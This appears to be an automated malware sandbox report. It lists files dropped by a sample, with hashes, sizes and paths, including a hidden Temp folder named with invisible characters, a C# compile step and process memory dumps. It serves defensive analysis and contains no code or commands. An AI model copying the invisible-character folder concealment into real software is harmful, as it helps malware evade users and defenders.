SHA256
f31a5b827225b08a48fbd39cbf202463389d0df82da634e764b393f07afc98db

SHA512
69fe70f78176f1638c852647f5dfe67209a7da381d013c24aafd6b3777622fb88a1268f42ac952dc6c5e096236753a8974af81f0277bff8ee57b6280709f971a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\ExpandPop.pdf

Filesize
385KB

MD5
0f67d496add6dcb69a8c11847bf1d2d3

SHA1
7e09c7a3a8520daef932088f3b96160419754a83

SHA256
ccdc55530ac9190cade5d34bf2079b54c47f0255ae32d82f44943e1617ef9aac

SHA512
e6d64c5a48f2906af0b800f1470db1670716549cbd6d10b86bbca0efadbf44988e92a538a3c7ec3e5f0517f891632260bdc5961264a5ff172a537a89235822a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\InvokeSend.csv

Filesize
365KB

MD5
3e5891fed7759d5bdaa2814a1a46995c

SHA1
355ee3a42bccd5c835789577d0433739fabfa1a6

SHA256
072a5ea7df72ad29c7a03c927aae8b242285d870616063160d5cef96f06a0058

SHA512
1537b40439ac2a145797d71adedcdc36b7487a69f32607a4c1f59ba07a1ddaca877391a37bb30093aa1d08990d9cc3c8f41368ef1ce6fb63463b5ecd3eb8f1b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\LimitUnpublish.xls

Filesize
641KB

MD5
ed0958d0fef00dc64679e7a09a154ae7

SHA1
9207380908633aa3e8990e90abe32873329801d5

SHA256
bec13f501493457dd7d6d89918a13dd169f0f6de5c31a5b97e58fec91cdbe94f

SHA512
f501d975a8f96bde67f4f91007ce55ffb465fbb4b960e681f4d03fe4bcc8a0f4291f92b6b76c5eb7882694dc9c0edae3489b59ee2081832b1077d7dff2bb55a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\NewPop.xlsx

Filesize
10KB

MD5
02e016528cf0d7d69c9ec90e67f48a97

SHA1
36497565206286b071b500a778f461cee171d790

SHA256
9daf26c83c126bbee4d6c5497cbbf340f8a46ff99cb76d58bed1d5c526540b37

SHA512
9a6433848e3bb56b38553cc800adab6f5167c5f758953798404102ebbcd7b178cd2fe206600ad7d3a5def8ae45ab9ceba7637a21592e609eaaeb2eb61146bf4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\ReadGrant.docx

Filesize
918KB

MD5
693085205a5c05c32b7b2996c1761fff

SHA1
832ea15da14445f7fe71e9c5508336efc7aa3d9b

SHA256
4980f1ddb872af4d88703deddcdcfd36524c9f9696eb046f7e0f692d736f2ab4

SHA512
da35ae0bfddce8fae4fa2dd2123d847c479fa01311abab97ad7f2de636ec06f1bb3eeee4d20bf04ab680fc6f7ba35d91f2c8563eda0a49e5fc9dc3883624f1d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\SkipRedo.docx

Filesize
13KB

MD5
2f2981b79646c83e1c36bfb83bbe81ca

SHA1
5121415fad78539ff946cbf4cde58f5d0d6ce388

SHA256
81e0de8a300dc50c6283461d50e5a9c9d38d846f0e51ca42e57e70b7042384f0

SHA512
97df4a24d62aaed0a4060aea8c1e14f11362ac34e64573fadc71080dc677b31be5ce4fe530301cc066021b294fe49db4e77ee4acb55c202123ad04390d21c743

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Documents\SwitchBackup.vst

Filesize
700KB

MD5
55b37f9aeea58415144d82060bd50bca

SHA1
f91df8cbe7a926ec3514b22954e24c6781115442

SHA256
31178a2e55a24267cef0795544241f72af9e28d0a220342b9b2963a0a06f42bc

SHA512
096b6160343e1c0e6be192300eb0c2a27b79b6c8ee9aaeeb59f6115f42e54d01416131fe95783aa247555c307629081a566bae43902c087caa21e48e3d00ba62

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Downloads\ConnectExit.jpg

Filesize
589KB

MD5
6af3d8718b5c19c44f484f1ab932339a

SHA1
f3e55943679503c8726dcef71a2e34c17dc90d66

SHA256
3269fe6970f6c496a6002b65183f93e4eb4ed069532544c5d8785e4ce2ed71e4

SHA512
f447dbbaa31b14fba690f070220a298bb18d2a370533151e80b414ab2eea6652550e51dd04a676ed44f5df625a6a25c9ead6e56ee0e381e91d9712a754be2beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Downloads\GetResize.mp4

Filesize
414KB

MD5
7fbe773e2d536c6f3fcee68fb01cffea

SHA1
d9f417c4a2ee6052e04614c8cf7a1703dd97b868

SHA256
f11364be67ca42355de19e83812cb5203044224a3fd5cd755630494a2eb146a2

SHA512
b26bcb00cfa5a267037b2cca8b6249c4025cdd43a2df71138f61232b4d64e396ac3cc13908a080b4b93980bef36792eaaa097f35f2a6ab1c08ab6c5146fd42a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Downloads\LimitSelect.docx

Filesize
461KB

MD5
b797ab91826dce3ad8268c032159ac6b

SHA1
4b98cfff1fc95ef180c6b57369a1835e4db7a4eb

SHA256
7655bf83f6a15fcbd183b0da4b6e0c2914a0eeda2bc45af19de38e60c39c144a

SHA512
36bd481c896d9f0886bba83c719cd10c79fa15c4aaf2d17e88eec3c9bb63c02ec2233e8410ae5b34d87c7c2b6800980f8c9e2b8c6af2a4f92b8fe2c2cf64a97d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‍ \Common Files\Downloads\UninstallPop.jpg

Filesize
557KB

MD5
4e94fd938c9f9ab13569e6b597d87992

SHA1
70e894aaec2807d27fc1d9a601f87c8d8e110c90

SHA256
742e91e317bfb0a14a55bb02cce2b4a5eabd37a6b7b3c760e56144433f30e2f4

SHA512
2e6cd219f5128ae72310a25bbf544532c74a8e5a7082b9bb74793c19e04a09193eeb52db81e1896a95e00d387132b23a0ce9cbbc4fb49b78e646c3bc07b775d8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jamkxofj\CSC2B9925EB64C34B8EAACC43281EE0285E.TMP

Filesize
652B

MD5
8464c41c4ccb1aca34f2787af222f6f8

SHA1
4340cca91f111538f3bd7b2dc5f33d60745eb7f4

SHA256
ee4e37ed68f3b806b85ed3517bf0a1304cb576c81ad8c024e6a6c07031d9cbe6

SHA512
649f7dcc81f5ec7d9c649db05869beb63382819b0807f4f5edbc355e503256157c31f860209c9a8194d1c22c1890e27a1b9339dcce6622b5011abe9a7ffa1d32

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jamkxofj\jamkxofj.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jamkxofj\jamkxofj.cmdline

Filesize
607B

MD5
dbc4b96fd1089da4ef56adf8727ec4c3

SHA1
f0e5ad52e9e403e30da50b7a04ee896ada2d282b

SHA256
436e4eb9425a692cff3ac6d20852b08750c76b5ae4ebd4f652e317ad84913739

SHA512
1219f87ea013f3cd428a95b1a22c30e3823b253954a2b09dd2b02f829f486a63b19edfe91401876328b9a81c11bef7d0c99a421093b2cc4a72ddb9913d723b68

Download Submit
memory/2516-295-0x0000012206870000-0x0000012206D99000-memory.dmp

Filesize
5.2MB

Download
memory/2516-73-0x00007FF92B0C0000-0x00007FF92B5E9000-memory.dmp

Filesize
5.2MB

Download
memory/2516-97-0x00007FF92B8A0000-0x00007FF92BA1E000-memory.dmp

Filesize
1.5MB

Download
memory/2516-351-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp

Filesize
6.8MB

Download
memory/2516-317-0x00007FF940230000-0x00007FF940255000-memory.dmp

Filesize
148KB

Download
memory/2516-316-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp

Filesize
6.8MB

Download
memory/2516-202-0x00007FF9411A0000-0x00007FF9411AD000-memory.dmp

Filesize
52KB

Download
memory/2516-330-0x00007FF92AFA0000-0x00007FF92B0BB000-memory.dmp

Filesize
1.1MB

Download
memory/2516-83-0x00007FF93BE00000-0x00007FF93BE24000-memory.dmp

Filesize
144KB

Download
memory/2516-81-0x00007FF93ECA0000-0x00007FF93ECBA000-memory.dmp

Filesize
104KB

Download
memory/2516-82-0x00007FF92AFA0000-0x00007FF92B0BB000-memory.dmp

Filesize
1.1MB

Download
memory/2516-78-0x00007FF940130000-0x00007FF94015D000-memory.dmp

Filesize
180KB

Download
memory/2516-322-0x00007FF92B8A0000-0x00007FF92BA1E000-memory.dmp

Filesize
1.5MB

Download
memory/2516-79-0x00007FF940560000-0x00007FF94056D000-memory.dmp

Filesize
52KB

Download
memory/2516-278-0x00007FF93B6D0000-0x00007FF93B703000-memory.dmp

Filesize
204KB

Download
memory/2516-76-0x00007FF93B7D0000-0x00007FF93B7E4000-memory.dmp

Filesize
80KB

Download
memory/2516-294-0x00007FF92B7D0000-0x00007FF92B89D000-memory.dmp

Filesize
820KB

Download
memory/2516-70-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp

Filesize
6.8MB

Download
memory/2516-297-0x00007FF92B0C0000-0x00007FF92B5E9000-memory.dmp

Filesize
5.2MB

Download
memory/2516-25-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp

Filesize
6.8MB

Download
memory/2516-74-0x00007FF940230000-0x00007FF940255000-memory.dmp

Filesize
148KB

Download
memory/2516-72-0x0000012206870000-0x0000012206D99000-memory.dmp

Filesize
5.2MB

Download
memory/2516-71-0x00007FF92B7D0000-0x00007FF92B89D000-memory.dmp

Filesize
820KB

Download
memory/2516-66-0x00007FF93B6D0000-0x00007FF93B703000-memory.dmp

Filesize
204KB

Download
memory/2516-64-0x00007FF9411A0000-0x00007FF9411AD000-memory.dmp

Filesize
52KB

Download
memory/2516-62-0x00007FF93B7F0000-0x00007FF93B809000-memory.dmp

Filesize
100KB

Download
memory/2516-60-0x00007FF92B8A0000-0x00007FF92BA1E000-memory.dmp

Filesize
1.5MB

Download
memory/2516-58-0x00007FF93BE00000-0x00007FF93BE24000-memory.dmp

Filesize
144KB

Download
memory/2516-56-0x00007FF93ECA0000-0x00007FF93ECBA000-memory.dmp

Filesize
104KB

Download
memory/2516-54-0x00007FF940130000-0x00007FF94015D000-memory.dmp

Filesize
180KB

Download
memory/2516-30-0x00007FF940230000-0x00007FF940255000-memory.dmp

Filesize
148KB

Download
memory/2516-312-0x00007FF93B7D0000-0x00007FF93B7E4000-memory.dmp

Filesize
80KB

Download
memory/2516-48-0x00007FF942E60000-0x00007FF942E6F000-memory.dmp

Filesize
60KB

Download
memory/4000-270-0x000002CAD5B50000-0x000002CAD5B58000-memory.dmp

Filesize
32KB

Download
memory/4064-96-0x00007FF92A420000-0x00007FF92AEE1000-memory.dmp

Filesize
10.8MB

Download
memory/4064-84-0x00007FF92A423000-0x00007FF92A425000-memory.dmp

Filesize
8KB

Download
memory/4064-90-0x000001E1FFEB0000-0x000001E1FFED2000-memory.dmp

Filesize
136KB

Download
memory/4064-95-0x00007FF92A420000-0x00007FF92AEE1000-memory.dmp

Filesize
10.8MB

Download
memory/4064-181-0x00007FF92A420000-0x00007FF92AEE1000-memory.dmp

Filesize
10.8MB

Download